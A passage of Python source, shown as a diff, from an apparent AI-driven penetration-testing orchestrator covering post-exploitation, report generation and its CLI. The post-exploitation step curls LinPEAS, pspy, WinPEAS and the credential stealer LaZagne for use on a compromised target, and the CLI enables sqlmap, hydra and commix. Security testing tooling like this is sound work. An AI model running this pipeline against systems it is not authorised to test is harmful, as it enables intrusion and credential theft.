# Check if shell access was obtained
|
|
1732
|
+
if not self.config.shell_obtained:
|
|
1733
|
+
self._log_tool("No shell access - skipping post-exploitation", "done")
|
|
1734
|
+
duration = time.time() - start_time
|
|
1735
|
+
result = PhaseResult(
|
|
1736
|
+
phase=phase,
|
|
1737
|
+
status="skipped",
|
|
1738
|
+
started_at=started_at,
|
|
1739
|
+
finished_at=datetime.now(timezone.utc).isoformat(),
|
|
1740
|
+
duration=duration,
|
|
1741
|
+
findings=[],
|
|
1742
|
+
tools_run=[],
|
|
1743
|
+
errors=[],
|
|
1744
|
+
metadata={"reason": "No shell access obtained during exploitation"}
|
|
1745
|
+
)
|
|
1746
|
+
self.phase_results[phase] = result
|
|
1747
|
+
return result
|
|
1748
|
+
|
|
1749
|
+
# Determine target OS
|
|
1750
|
+
target_os = self.config.target_os or "linux" # Default to linux
|
|
1751
|
+
self._log_tool(f"Target OS: {target_os}", "done")
|
|
1752
|
+
|
|
1753
|
+
# ==================== LINUX POST-EXPLOITATION ====================
|
|
1754
|
+
if target_os == "linux":
|
|
1755
|
+
|
|
1756
|
+
# 1. LinPEAS - Linux Privilege Escalation
|
|
1757
|
+
if "linpeas" in self.config.post_exploit_tools:
|
|
1758
|
+
self._log_tool("linpeas", "running")
|
|
1759
|
+
# Note: In real scenario, this would be uploaded and executed on target
|
|
1760
|
+
# For now, we simulate the check
|
|
1761
|
+
ret, output = await self._run_command(
|
|
1762
|
+
f"curl -sL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o /tmp/linpeas.sh 2>/dev/null && echo 'Downloaded'",
|
|
1763
|
+
timeout=60
|
|
1764
|
+
)
|
|
1765
|
+
if ret == 0 and "Downloaded" in output:
|
|
1766
|
+
tools_run.append("linpeas")
|
|
1767
|
+
findings.append(Finding(
|
|
1768
|
+
type="post_exploit_tool",
|
|
1769
|
+
value="LinPEAS ready",
|
|
1770
|
+
description="LinPEAS privilege escalation script downloaded and ready for execution on target",
|
|
1771
|
+
severity="info",
|
|
1772
|
+
phase="post_exploit",
|
|
1773
|
+
tool="linpeas",
|
|
1774
|
+
target=self.domain,
|
|
1775
|
+
metadata={"script_path": "/tmp/linpeas.sh"}
|
|
1776
|
+
))
|
|
1777
|
+
self._log_tool("linpeas - downloaded", "done")
|
|
1778
|
+
|
|
1779
|
+
# 2. pspy - Process Monitoring
|
|
1780
|
+
if "pspy" in self.config.post_exploit_tools:
|
|
1781
|
+
self._log_tool("pspy", "running")
|
|
1782
|
+
ret, output = await self._run_command(
|
|
1783
|
+
f"curl -sL https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64 -o /tmp/pspy64 2>/dev/null && chmod +x /tmp/pspy64 && echo 'Downloaded'",
|
|
1784
|
+
timeout=60
|
|
1785
|
+
)
|
|
1786
|
+
if ret == 0 and "Downloaded" in output:
|
|
1787
|
+
tools_run.append("pspy")
|
|
1788
|
+
findings.append(Finding(
|
|
1789
|
+
type="post_exploit_tool",
|
|
1790
|
+
value="pspy ready",
|
|
1791
|
+
description="pspy process monitor downloaded for cron job and process analysis",
|
|
1792
|
+
severity="info",
|
|
1793
|
+
phase="post_exploit",
|
|
1794
|
+
tool="pspy",
|
|
1795
|
+
target=self.domain,
|
|
1796
|
+
metadata={"binary_path": "/tmp/pspy64"}
|
|
1797
|
+
))
|
|
1798
|
+
self._log_tool("pspy - downloaded", "done")
|
|
1799
|
+
|
|
1800
|
+
# ==================== WINDOWS POST-EXPLOITATION ====================
|
|
1801
|
+
elif target_os == "windows":
|
|
1802
|
+
|
|
1803
|
+
# 1. WinPEAS - Windows Privilege Escalation
|
|
1804
|
+
if "winpeas" in self.config.post_exploit_tools:
|
|
1805
|
+
self._log_tool("winpeas", "running")
|
|
1806
|
+
ret, output = await self._run_command(
|
|
1807
|
+
f"curl -sL https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe -o /tmp/winpeas.exe 2>/dev/null && echo 'Downloaded'",
|
|
1808
|
+
timeout=60
|
|
1809
|
+
)
|
|
1810
|
+
if ret == 0 and "Downloaded" in output:
|
|
1811
|
+
tools_run.append("winpeas")
|
|
1812
|
+
findings.append(Finding(
|
|
1813
|
+
type="post_exploit_tool",
|
|
1814
|
+
value="WinPEAS ready",
|
|
1815
|
+
description="WinPEAS privilege escalation tool downloaded for Windows target",
|
|
1816
|
+
severity="info",
|
|
1817
|
+
phase="post_exploit",
|
|
1818
|
+
tool="winpeas",
|
|
1819
|
+
target=self.domain,
|
|
1820
|
+
metadata={"binary_path": "/tmp/winpeas.exe"}
|
|
1821
|
+
))
|
|
1822
|
+
self._log_tool("winpeas - downloaded", "done")
|
|
1823
|
+
|
|
1824
|
+
# 2. LaZagne - Credential Recovery
|
|
1825
|
+
if "lazagne" in self.config.post_exploit_tools:
|
|
1826
|
+
self._log_tool("lazagne", "running")
|
|
1827
|
+
ret, output = await self._run_command(
|
|
1828
|
+
f"curl -sL https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe -o /tmp/lazagne.exe 2>/dev/null && echo 'Downloaded'",
|
|
1829
|
+
timeout=60
|
|
1830
|
+
)
|
|
1831
|
+
if ret == 0 and "Downloaded" in output:
|
|
1832
|
+
tools_run.append("lazagne")
|
|
1833
|
+
findings.append(Finding(
|
|
1834
|
+
type="post_exploit_tool",
|
|
1835
|
+
value="LaZagne ready",
|
|
1836
|
+
description="LaZagne credential recovery tool downloaded for Windows target",
|
|
1837
|
+
severity="info",
|
|
1838
|
+
phase="post_exploit",
|
|
1839
|
+
tool="lazagne",
|
|
1840
|
+
target=self.domain,
|
|
1841
|
+
metadata={"binary_path": "/tmp/lazagne.exe"}
|
|
1842
|
+
))
|
|
1843
|
+
self._log_tool("lazagne - downloaded", "done")
|
|
1844
|
+
|
|
1845
|
+
# 3. Generate Post-Exploitation Report
|
|
1846
|
+
post_exploit_report = {
|
|
1847
|
+
"target": self.domain,
|
|
1848
|
+
"target_os": target_os,
|
|
1849
|
+
"shell_obtained": self.config.shell_obtained,
|
|
1850
|
+
"tools_prepared": tools_run,
|
|
1851
|
+
"recommendations": [
|
|
1852
|
+
"Execute LinPEAS/WinPEAS on target for privilege escalation paths",
|
|
1853
|
+
"Run pspy to monitor for cron jobs and scheduled tasks",
|
|
1854
|
+
"Use LaZagne to recover stored credentials",
|
|
1855
|
+
"Check for kernel exploits based on version",
|
|
1856
|
+
"Look for SUID binaries (Linux) or service misconfigurations (Windows)"
|
|
1857
|
+
]
|
|
1858
|
+
}
|
|
1859
|
+
(self.output_dir / "post_exploit_report.json").write_text(json.dumps(post_exploit_report, indent=2))
|
|
1860
|
+
|
|
1861
|
+
# Add findings to global list
|
|
1862
|
+
for f in findings:
|
|
1863
|
+
self._add_finding(f)
|
|
1864
|
+
|
|
1865
|
+
duration = time.time() - start_time
|
|
1866
|
+
result = PhaseResult(
|
|
1867
|
+
phase=phase,
|
|
1868
|
+
status="completed",
|
|
1869
|
+
started_at=started_at,
|
|
1870
|
+
finished_at=datetime.now(timezone.utc).isoformat(),
|
|
1871
|
+
duration=duration,
|
|
1872
|
+
findings=findings,
|
|
1873
|
+
tools_run=tools_run,
|
|
1874
|
+
errors=errors,
|
|
1875
|
+
metadata={
|
|
1876
|
+
"target_os": target_os,
|
|
1877
|
+
"shell_obtained": self.config.shell_obtained
|
|
1878
|
+
}
|
|
1879
|
+
)
|
|
1880
|
+
|
|
1881
|
+
self.phase_results[phase] = result
|
|
1882
|
+
if self.on_phase_complete:
|
|
1883
|
+
self.on_phase_complete(result)
|
|
1884
|
+
|
|
1885
|
+
return result
|
|
1886
|
+
|
|
1887
|
+
# ==================== REPORT PHASE ====================
|
|
1888
|
+
|
|
1889
|
+
async def run_report(self) -> PhaseResult:
|
|
1890
|
+
"""Execute report generation phase."""
|
|
1891
|
+
phase = Phase.REPORT
|
|
1892
|
+
started_at = datetime.now(timezone.utc).isoformat()
|
|
1893
|
+
start_time = time.time()
|
|
1894
|
+
findings = []
|
|
1895
|
+
tools_run = []
|
|
1896
|
+
errors = []
|
|
1897
|
+
|
|
1898
|
+
if self.on_phase_start:
|
|
1899
|
+
self.on_phase_start(phase)
|
|
1900
|
+
|
|
1901
|
+
self._log_phase(phase, f"Generating Report for {self.domain}")
|
|
1902
|
+
|
|
1903
|
+
# 1. Generate Summary
|
|
1904
|
+
summary = self._generate_summary()
|
|
1905
|
+
(self.output_dir / "SUMMARY.md").write_text(summary)
|
|
1906
|
+
tools_run.append("summary_generator")
|
|
1907
|
+
self._log_tool("Summary generated", "done")
|
|
1908
|
+
|
|
1909
|
+
# 2. Generate Findings JSON
|
|
1910
|
+
findings_data = [
|
|
1911
|
+
{
|
|
1912
|
+
"type": f.type,
|
|
1913
|
+
"value": f.value,
|
|
1914
|
+
"description": f.description,
|
|
1915
|
+
"severity": f.severity,
|
|
1916
|
+
"phase": f.phase,
|
|
1917
|
+
"tool": f.tool,
|
|
1918
|
+
"target": f.target,
|
|
1919
|
+
"metadata": f.metadata,
|
|
1920
|
+
"timestamp": f.timestamp
|
|
1921
|
+
}
|
|
1922
|
+
for f in self.findings
|
|
1923
|
+
]
|
|
1924
|
+
(self.output_dir / "findings.json").write_text(json.dumps(findings_data, indent=2))
|
|
1925
|
+
tools_run.append("findings_export")
|
|
1926
|
+
self._log_tool("Findings exported", "done")
|
|
1927
|
+
|
|
1928
|
+
# 3. Generate HTML Report
|
|
1929
|
+
if self.config.report_format == "html":
|
|
1930
|
+
html_report = self._generate_html_report()
|
|
1931
|
+
report_file = self.output_dir / f"VAPT_Report_{self.domain.replace('.', '_')}.html"
|
|
1932
|
+
report_file.write_text(html_report)
|
|
1933
|
+
tools_run.append("html_report")
|
|
1934
|
+
self._log_tool(f"HTML Report: {report_file.name}", "done")
|
|
1935
|
+
|
|
1936
|
+
duration = time.time() - start_time
|
|
1937
|
+
result = PhaseResult(
|
|
1938
|
+
phase=phase,
|
|
1939
|
+
status="completed",
|
|
1940
|
+
started_at=started_at,
|
|
1941
|
+
finished_at=datetime.now(timezone.utc).isoformat(),
|
|
1942
|
+
duration=duration,
|
|
1943
|
+
findings=findings,
|
|
1944
|
+
tools_run=tools_run,
|
|
1945
|
+
errors=errors,
|
|
1946
|
+
metadata={
|
|
1947
|
+
"output_dir": str(self.output_dir),
|
|
1948
|
+
"total_findings": len(self.findings)
|
|
1949
|
+
}
|
|
1950
|
+
)
|
|
1951
|
+
|
|
1952
|
+
self.phase_results[phase] = result
|
|
1953
|
+
if self.on_phase_complete:
|
|
1954
|
+
self.on_phase_complete(result)
|
|
1955
|
+
|
|
1956
|
+
return result
|
|
1957
|
+
|
|
1958
|
+
def _generate_summary(self) -> str:
|
|
1959
|
+
"""Generate markdown summary."""
|
|
1960
|
+
severity_counts = {"critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}
|
|
1961
|
+
for f in self.findings:
|
|
1962
|
+
sev = f.severity.lower()
|
|
1963
|
+
if sev in severity_counts:
|
|
1964
|
+
severity_counts[sev] += 1
|
|
1965
|
+
|
|
1966
|
+
phases_info = []
|
|
1967
|
+
for phase, result in self.phase_results.items():
|
|
1968
|
+
phases_info.append(f"| {phase.value.upper()} | {result.status} | {result.duration:.1f}s | {len(result.findings)} |")
|
|
1969
|
+
|
|
1970
|
+
return f"""# AIPT Scan Summary
|
|
1971
|
+
|
|
1972
|
+
## Target Information
|
|
1973
|
+
- **Domain**: {self.domain}
|
|
1974
|
+
- **Target URL**: {self.target}
|
|
1975
|
+
- **Scan Date**: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}
|
|
1976
|
+
- **Report ID**: VAPT-{self.domain.upper().replace('.', '-')}-{datetime.now().strftime('%Y%m%d')}
|
|
1977
|
+
|
|
1978
|
+
## Vulnerability Summary
|
|
1979
|
+
| Severity | Count |
|
|
1980
|
+
|----------|-------|
|
|
1981
|
+
| 🔴 Critical | {severity_counts['critical']} |
|
|
1982
|
+
| 🟠 High | {severity_counts['high']} |
|
|
1983
|
+
| 🟡 Medium | {severity_counts['medium']} |
|
|
1984
|
+
| 🔵 Low | {severity_counts['low']} |
|
|
1985
|
+
| ⚪ Info | {severity_counts['info']} |
|
|
1986
|
+
| **Total** | **{len(self.findings)}** |
|
|
1987
|
+
|
|
1988
|
+
## Phase Results
|
|
1989
|
+
| Phase | Status | Duration | Findings |
|
|
1990
|
+
|-------|--------|----------|----------|
|
|
1991
|
+
{chr(10).join(phases_info)}
|
|
1992
|
+
|
|
1993
|
+
## Scanner IDs
|
|
1994
|
+
{json.dumps(self.scan_ids, indent=2) if self.scan_ids else 'No enterprise scans'}
|
|
1995
|
+
|
|
1996
|
+
## Assets Discovered
|
|
1997
|
+
- Subdomains: {len(self.subdomains)}
|
|
1998
|
+
- Live Hosts: {len(self.live_hosts)}
|
|
1999
|
+
|
|
2000
|
+
## Output Directory
|
|
2001
|
+
{self.output_dir}
|
|
2002
|
+
"""
|
|
2003
|
+
|
|
2004
|
+
def _generate_html_report(self) -> str:
|
|
2005
|
+
"""Generate HTML report."""
|
|
2006
|
+
severity_counts = {"critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}
|
|
2007
|
+
for f in self.findings:
|
|
2008
|
+
sev = f.severity.lower()
|
|
2009
|
+
if sev in severity_counts:
|
|
2010
|
+
severity_counts[sev] += 1
|
|
2011
|
+
|
|
2012
|
+
findings_html = ""
|
|
2013
|
+
for f in self.findings:
|
|
2014
|
+
sev_class = f.severity.lower()
|
|
2015
|
+
findings_html += f"""
|
|
2016
|
+
<div class="finding {sev_class}">
|
|
2017
|
+
<div class="finding-header">
|
|
2018
|
+
<span class="severity-badge {sev_class}">{f.severity.upper()}</span>
|
|
2019
|
+
<span class="finding-title">{f.value}</span>
|
|
2020
|
+
<span class="finding-tool">{f.tool}</span>
|
|
2021
|
+
</div>
|
|
2022
|
+
<div class="finding-body">
|
|
2023
|
+
<p>{f.description}</p>
|
|
2024
|
+
<small>Target: {f.target or self.target} | Phase: {f.phase}</small>
|
|
2025
|
+
</div>
|
|
2026
|
+
</div>
|
|
2027
|
+
"""
|
|
2028
|
+
|
|
2029
|
+
return f"""<!DOCTYPE html>
|
|
2030
|
+
<html lang="en">
|
|
2031
|
+
<head>
|
|
2032
|
+
<meta charset="UTF-8">
|
|
2033
|
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
|
2034
|
+
<title>VAPT Report - {self.domain}</title>
|
|
2035
|
+
<style>
|
|
2036
|
+
:root {{
|
|
2037
|
+
--critical: #dc3545;
|
|
2038
|
+
--high: #fd7e14;
|
|
2039
|
+
--medium: #ffc107;
|
|
2040
|
+
--low: #17a2b8;
|
|
2041
|
+
--info: #6c757d;
|
|
2042
|
+
}}
|
|
2043
|
+
body {{ font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; margin: 0; padding: 20px; background: #f5f5f5; }}
|
|
2044
|
+
.container {{ max-width: 1200px; margin: 0 auto; }}
|
|
2045
|
+
.header {{ background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; padding: 40px; border-radius: 10px; margin-bottom: 30px; }}
|
|
2046
|
+
.header h1 {{ margin: 0 0 10px 0; }}
|
|
2047
|
+
.stats {{ display: grid; grid-template-columns: repeat(5, 1fr); gap: 15px; margin-bottom: 30px; }}
|
|
2048
|
+
.stat {{ background: white; padding: 20px; border-radius: 10px; text-align: center; box-shadow: 0 2px 4px rgba(0,0,0,0.1); }}
|
|
2049
|
+
.stat .number {{ font-size: 2em; font-weight: bold; }}
|
|
2050
|
+
.stat.critical .number {{ color: var(--critical); }}
|
|
2051
|
+
.stat.high .number {{ color: var(--high); }}
|
|
2052
|
+
.stat.medium .number {{ color: var(--medium); }}
|
|
2053
|
+
.stat.low .number {{ color: var(--low); }}
|
|
2054
|
+
.stat.info .number {{ color: var(--info); }}
|
|
2055
|
+
.findings {{ background: white; border-radius: 10px; padding: 20px; box-shadow: 0 2px 4px rgba(0,0,0,0.1); }}
|
|
2056
|
+
.finding {{ border-left: 4px solid; padding: 15px; margin-bottom: 15px; background: #fafafa; border-radius: 0 5px 5px 0; }}
|
|
2057
|
+
.finding.critical {{ border-color: var(--critical); }}
|
|
2058
|
+
.finding.high {{ border-color: var(--high); }}
|
|
2059
|
+
.finding.medium {{ border-color: var(--medium); }}
|
|
2060
|
+
.finding.low {{ border-color: var(--low); }}
|
|
2061
|
+
.finding.info {{ border-color: var(--info); }}
|
|
2062
|
+
.finding-header {{ display: flex; align-items: center; gap: 10px; margin-bottom: 10px; }}
|
|
2063
|
+
.severity-badge {{ padding: 3px 8px; border-radius: 3px; font-size: 0.8em; color: white; }}
|
|
2064
|
+
.severity-badge.critical {{ background: var(--critical); }}
|
|
2065
|
+
.severity-badge.high {{ background: var(--high); }}
|
|
2066
|
+
.severity-badge.medium {{ background: var(--medium); }}
|
|
2067
|
+
.severity-badge.low {{ background: var(--low); }}
|
|
2068
|
+
.severity-badge.info {{ background: var(--info); }}
|
|
2069
|
+
.finding-title {{ font-weight: bold; flex-grow: 1; }}
|
|
2070
|
+
.finding-tool {{ color: #666; font-size: 0.9em; }}
|
|
2071
|
+
.finding-body p {{ margin: 0 0 10px 0; }}
|
|
2072
|
+
.finding-body small {{ color: #666; }}
|
|
2073
|
+
</style>
|
|
2074
|
+
</head>
|
|
2075
|
+
<body>
|
|
2076
|
+
<div class="container">
|
|
2077
|
+
<div class="header">
|
|
2078
|
+
<h1>🔒 VAPT Report</h1>
|
|
2079
|
+
<p><strong>Target:</strong> {self.domain}</p>
|
|
2080
|
+
<p><strong>Date:</strong> {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}</p>
|
|
2081
|
+
<p><strong>Report ID:</strong> VAPT-{self.domain.upper().replace('.', '-')}-{datetime.now().strftime('%Y%m%d')}</p>
|
|
2082
|
+
</div>
|
|
2083
|
+
|
|
2084
|
+
<div class="stats">
|
|
2085
|
+
<div class="stat critical"><div class="number">{severity_counts['critical']}</div><div>Critical</div></div>
|
|
2086
|
+
<div class="stat high"><div class="number">{severity_counts['high']}</div><div>High</div></div>
|
|
2087
|
+
<div class="stat medium"><div class="number">{severity_counts['medium']}</div><div>Medium</div></div>
|
|
2088
|
+
<div class="stat low"><div class="number">{severity_counts['low']}</div><div>Low</div></div>
|
|
2089
|
+
<div class="stat info"><div class="number">{severity_counts['info']}</div><div>Info</div></div>
|
|
2090
|
+
</div>
|
|
2091
|
+
|
|
2092
|
+
<div class="findings">
|
|
2093
|
+
<h2>Findings ({len(self.findings)})</h2>
|
|
2094
|
+
{findings_html if findings_html else '<p>No vulnerabilities found.</p>'}
|
|
2095
|
+
</div>
|
|
2096
|
+
|
|
2097
|
+
<div style="text-align: center; margin-top: 30px; color: #666;">
|
|
2098
|
+
<p>Generated by AIPT - AI-Powered Penetration Testing</p>
|
|
2099
|
+
<p>Scanners: {', '.join(self.scan_ids.keys()) if self.scan_ids else 'Open Source Tools'}</p>
|
|
2100
|
+
</div>
|
|
2101
|
+
</div>
|
|
2102
|
+
</body>
|
|
2103
|
+
</html>"""
|
|
2104
|
+
|
|
2105
|
+
# ==================== MAIN RUNNER ====================
|
|
2106
|
+
|
|
2107
|
+
async def run(self, phases: Optional[List[Phase]] = None) -> Dict[str, Any]:
|
|
2108
|
+
"""
|
|
2109
|
+
Run the full orchestration pipeline.
|
|
2110
|
+
|
|
2111
|
+
Args:
|
|
2112
|
+
phases: Optional list of phases to run (default: all)
|
|
2113
|
+
|
|
2114
|
+
Returns:
|
|
2115
|
+
Complete results dictionary
|
|
2116
|
+
"""
|
|
2117
|
+
if phases is None:
|
|
2118
|
+
phases = [Phase.RECON, Phase.SCAN, Phase.ANALYZE, Phase.EXPLOIT, Phase.POST_EXPLOIT, Phase.REPORT]
|
|
2119
|
+
|
|
2120
|
+
start_time = time.time()
|
|
2121
|
+
|
|
2122
|
+
print("\n" + "="*60)
|
|
2123
|
+
print(" AIPT - AI-Powered Penetration Testing (v2.1 - Maximum Tools)")
|
|
2124
|
+
print("="*60)
|
|
2125
|
+
print(f" Target: {self.domain}")
|
|
2126
|
+
print(f" Output: {self.output_dir}")
|
|
2127
|
+
print(f" Mode: {'FULL (All Tools)' if self.config.full_mode else 'Standard'}")
|
|
2128
|
+
print(f" Intelligence: {'Enabled' if self.config.enable_intelligence else 'Disabled'}")
|
|
2129
|
+
print(f" Acunetix: {'Enabled' if self.config.use_acunetix else 'Disabled'}")
|
|
2130
|
+
print(f" Burp: {'Enabled' if self.config.use_burp else 'Disabled'}")
|
|
2131
|
+
print(f" Nessus: {'Enabled' if self.config.use_nessus else 'Disabled'}")
|
|
2132
|
+
print(f" ZAP: {'Enabled' if self.config.use_zap else 'Disabled'}")
|
|
2133
|
+
print(f" Exploitation: {'Enabled' if (self.config.full_mode or self.config.enable_exploitation) else 'Disabled'}")
|
|
2134
|
+
print("="*60 + "\n")
|
|
2135
|
+
|
|
2136
|
+
try:
|
|
2137
|
+
if Phase.RECON in phases and not self.config.skip_recon:
|
|
2138
|
+
await self.run_recon()
|
|
2139
|
+
|
|
2140
|
+
if Phase.SCAN in phases and not self.config.skip_scan:
|
|
2141
|
+
await self.run_scan()
|
|
2142
|
+
|
|
2143
|
+
# NEW: Intelligence Analysis Phase
|
|
2144
|
+
if Phase.ANALYZE in phases and self.config.enable_intelligence:
|
|
2145
|
+
await self.run_analyze()
|
|
2146
|
+
|
|
2147
|
+
if Phase.EXPLOIT in phases and not self.config.skip_exploit:
|
|
2148
|
+
await self.run_exploit()
|
|
2149
|
+
|
|
2150
|
+
# Auto-trigger POST_EXPLOIT if shell was obtained
|
|
2151
|
+
if Phase.POST_EXPLOIT in phases and self.config.shell_obtained:
|
|
2152
|
+
await self.run_post_exploit()
|
|
2153
|
+
|
|
2154
|
+
if Phase.REPORT in phases and not self.config.skip_report:
|
|
2155
|
+
await self.run_report()
|
|
2156
|
+
|
|
2157
|
+
except Exception as e:
|
|
2158
|
+
logger.exception(f"Orchestration error: {e}")
|
|
2159
|
+
raise
|
|
2160
|
+
|
|
2161
|
+
total_duration = time.time() - start_time
|
|
2162
|
+
|
|
2163
|
+
# Final summary
|
|
2164
|
+
print("\n" + "="*60)
|
|
2165
|
+
print(" SCAN COMPLETE")
|
|
2166
|
+
print("="*60)
|
|
2167
|
+
print(f" Duration: {total_duration:.1f}s")
|
|
2168
|
+
print(f" Findings: {len(self.findings)}")
|
|
2169
|
+
if self.attack_chains:
|
|
2170
|
+
print(f" Attack Chains: {len(self.attack_chains)}")
|
|
2171
|
+
print(f" Output: {self.output_dir}")
|
|
2172
|
+
print("="*60 + "\n")
|
|
2173
|
+
|
|
2174
|
+
return {
|
|
2175
|
+
"target": self.target,
|
|
2176
|
+
"domain": self.domain,
|
|
2177
|
+
"duration": total_duration,
|
|
2178
|
+
"phases": {p.value: r.__dict__ for p, r in self.phase_results.items()},
|
|
2179
|
+
"findings_count": len(self.findings),
|
|
2180
|
+
"attack_chains_count": len(self.attack_chains),
|
|
2181
|
+
"scan_ids": self.scan_ids,
|
|
2182
|
+
"output_dir": str(self.output_dir)
|
|
2183
|
+
}
|
|
2184
|
+
|
|
2185
|
+
|
|
2186
|
+
# ==================== CLI ====================
|
|
2187
|
+
|
|
2188
|
+
async def main():
|
|
2189
|
+
"""CLI entry point."""
|
|
2190
|
+
import argparse
|
|
2191
|
+
|
|
2192
|
+
parser = argparse.ArgumentParser(
|
|
2193
|
+
description="AIPT Orchestrator - Full Penetration Testing Pipeline (v2.1 - Maximum Tools)",
|
|
2194
|
+
formatter_class=argparse.RawDescriptionHelpFormatter,
|
|
2195
|
+
epilog="""
|
|
2196
|
+
Examples:
|
|
2197
|
+
aiptx scan example.com # Standard scan
|
|
2198
|
+
aiptx scan example.com --full # Full scan with exploitation tools
|
|
2199
|
+
aiptx scan example.com --full --exploit # Enable all exploitation
|
|
2200
|
+
aiptx scan example.com --nessus --zap # With enterprise scanners
|
|
2201
|
+
|
|
2202
|
+
Tools included:
|
|
2203
|
+
RECON: subfinder, assetfinder, amass, nmap, waybackurls, theHarvester, dnsrecon, wafw00f, whatweb
|
|
2204
|
+
SCAN: nuclei, ffuf, sslscan, nikto, wpscan, testssl, gobuster, dirsearch
|
|
2205
|
+
EXPLOIT: sqlmap, commix, xsstrike, hydra, searchsploit (--full mode)
|
|
2206
|
+
POST: linpeas, winpeas, pspy, lazagne (auto-triggers on shell access)
|
|
2207
|
+
"""
|
|
2208
|
+
)
|
|
2209
|
+
|
|
2210
|
+
# Target
|
|
2211
|
+
parser.add_argument("target", help="Target domain or URL")
|
|
2212
|
+
parser.add_argument("-o", "--output", default="./scan_results", help="Output directory")
|
|
2213
|
+
|
|
2214
|
+
# Scan modes
|
|
2215
|
+
parser.add_argument("--full", action="store_true",
|
|
2216
|
+
help="Enable FULL mode with all tools including exploitation")
|
|
2217
|
+
parser.add_argument("--exploit", action="store_true",
|
|
2218
|
+
help="Enable exploitation tools (sqlmap, hydra, commix)")
|
|
2219
|
+
|
|
2220
|
+
# Phase control
|
|
2221
|
+
parser.add_argument("--skip-recon", action="store_true", help="Skip reconnaissance phase")
|
|
2222
|
+
parser.add_argument("--skip-scan", action="store_true", help="Skip scanning phase")
|
|
2223
|
+
parser.add_argument("--skip-exploit", action="store_true", help="Skip exploitation phase")
|
|
2224
|
+
|
|
2225
|
+
# Enterprise scanners
|
|
2226
|
+
parser.add_argument("--no-acunetix", action="store_true", help="Disable Acunetix")
|
|
2227
|
+
parser.add_argument("--no-burp", action="store_true", help="Disable Burp Suite")
|
|
2228
|
+
parser.add_argument("--nessus", action="store_true", help="Enable Nessus scanner")
|
|
2229
|
+
parser.add_argument("--zap", action="store_true", help="Enable OWASP ZAP scanner")
|
|
2230
|
+
parser.add_argument("--wait", action="store_true", help="Wait for enterprise scanners to complete")
|
|
2231
|
+
parser.add_argument("--acunetix-profile", default="full",
|
|
2232
|
+
choices=["full", "high_risk", "xss", "sqli"],
|
|
2233
|
+
help="Acunetix scan profile")
|
|
2234
|
+
|
|
2235
|
+
# SQLMap settings
|
|
2236
|
+
parser.add_argument("--sqlmap-level", type=int, default=2,
|
|
2237
|
+
help="SQLMap testing level (1-5, default: 2)")
|
|
2238
|
+
parser.add_argument("--sqlmap-risk", type=int, default=2,
|
|
2239
|
+
help="SQLMap risk level (1-3, default: 2)")
|
|
2240
|
+
|
|
2241
|
+
# DevSecOps
|
|
2242
|
+
parser.add_argument("--container", action="store_true",
|
|
2243
|
+
help="Enable container security scanning (trivy)")
|
|
2244
|
+
parser.add_argument("--secrets", action="store_true",
|
|
2245
|
+
help="Enable secret detection (gitleaks, trufflehog)")
|
|
2246
|
+
|
|
2247
|
+
args = parser.parse_args()
|
|
2248
|
+
|
|
2249
|
+
config = OrchestratorConfig(
|
|
2250
|
+
target=args.target,
|
|
2251
|
+
output_dir=args.output,
|
|
2252
|
+
full_mode=args.full,
|
|
2253
|
+
skip_recon=args.skip_recon,
|
|
2254
|
+
skip_scan=args.skip_scan,
|
|
2255
|
+
skip_exploit=args.skip_exploit,
|
|
2256
|
+
use_acunetix=not args.no_acunetix,
|
|
2257
|
+
use_burp=not args.no_burp,
|
|
2258
|
+
use_nessus=args.nessus,
|
|
2259
|
+
use_zap=args.zap,
|
|
2260
|
+
wait_for_scanners=args.wait,
|
|
2261
|
+
acunetix_profile=args.acunetix_profile,
|
|
2262
|
+
enable_exploitation=args.exploit or args.full,
|
|
2263
|
+
sqlmap_level=args.sqlmap_level,
|
|
2264
|
+
sqlmap_risk=args.sqlmap_risk,
|
|
2265
|
+
enable_container_scan=args.container,
|
|
2266
|
+
enable_secret_detection=args.secrets
|
|
2267
|
+
)
|
|
2268
|
+
|
|
2269
|
+
orchestrator = Orchestrator(args.target, config)
|
|
2270
|
+
results = await orchestrator.run()
|
|
2271
|
+
|
|
2272
|
+
# Summary
|
|
2273
|
+
print(f"\n{'='*60}")
|
|
2274
|
+
print(f" ✓ SCAN COMPLETE - {results['findings_count']} findings")
|
|
2275
|
+
print(f"{'='*60}")
|
|
2276
|
+
print(f" Output: {results['output_dir']}")
|
|
2277
|
+
print(f" Duration: {results['duration']:.1f}s")
|
|
2278
|
+
if config.full_mode:
|
|
2279
|
+
print(f" Mode: FULL (All exploitation tools enabled)")
|
|
2280
|
+
print(f"{'='*60}\n")
|
|
2281
|
+
|
|
2282
|
+
|
|
2283
|
+
if __name__ == "__main__":
|
|
2284
|
+
asyncio.run(main())
|